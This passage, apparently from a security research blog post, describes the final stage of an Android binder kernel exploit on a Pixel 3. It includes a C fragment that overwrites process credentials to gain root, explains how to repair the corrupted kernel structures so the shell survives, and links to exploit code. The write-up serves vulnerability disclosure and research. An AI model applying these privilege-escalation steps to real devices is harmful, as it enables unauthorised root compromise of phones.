   write64(current + REAL_CRED_OFFSET + 8, init_cred);

   if (getuid() != 0) {
      printf("[!!] Something went wrong, we're not root!!\n");
      goto out;
   }

However this is not enough to enjoy a root shell yet, since we have corrupted quite some memory in kernel land and things will break as soon as we exit the current process and execute the shell. There are a few things that we need to repair:

The binder_node structures we used to perform write primitives were reallocated through sendmsg, but have been freed again when performing the write. We need to make sure the corresponding threads do not free these objects again upon returning from sendmsg. For that, we parse the thread stacks and replace any references we find to these nodes by ZERO_SIZE_PTR.

We have modified the f_inode of a struct file, which now points into the middle of an epitem. The easiest way around this is to simply bump the reference count for this file such that release is never called on it.
While setting up the read primitive, we also corrupted a field in the epitem itself. This field was a linked list with one epitem only, so we can just copy the fllist.prev field on top of fllist.next to restore the list.
We also added a fake entry to /proc/sys, which we could leave around ... but in that case it'd be pointing to pages that belonged to our exploit and are now recycled by the kernel. We decided to just remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but there is still a cached path in the kernel. Since we used a randomized name, chances are small that anybody would try to access it in the future by directly opening it.

After cleaning all this mess up, we can finally execute our root shell and enjoy uid 0 without a crashing phone.

Demonstration video

The following video shows the process of rooting the phone from an adb shell using the exploit we just described:

Code

You can find the code for the exploits described in this and the previous post at the Blue Frost Security GitHub. The exploit has only been tested on a Pixel 3 phone using the firmware from February 2020, and would need to be adapted for other firmwares. In particular there are a number of kernel offsets used in the exploit, as well as structure offsets that may vary between kernel versions.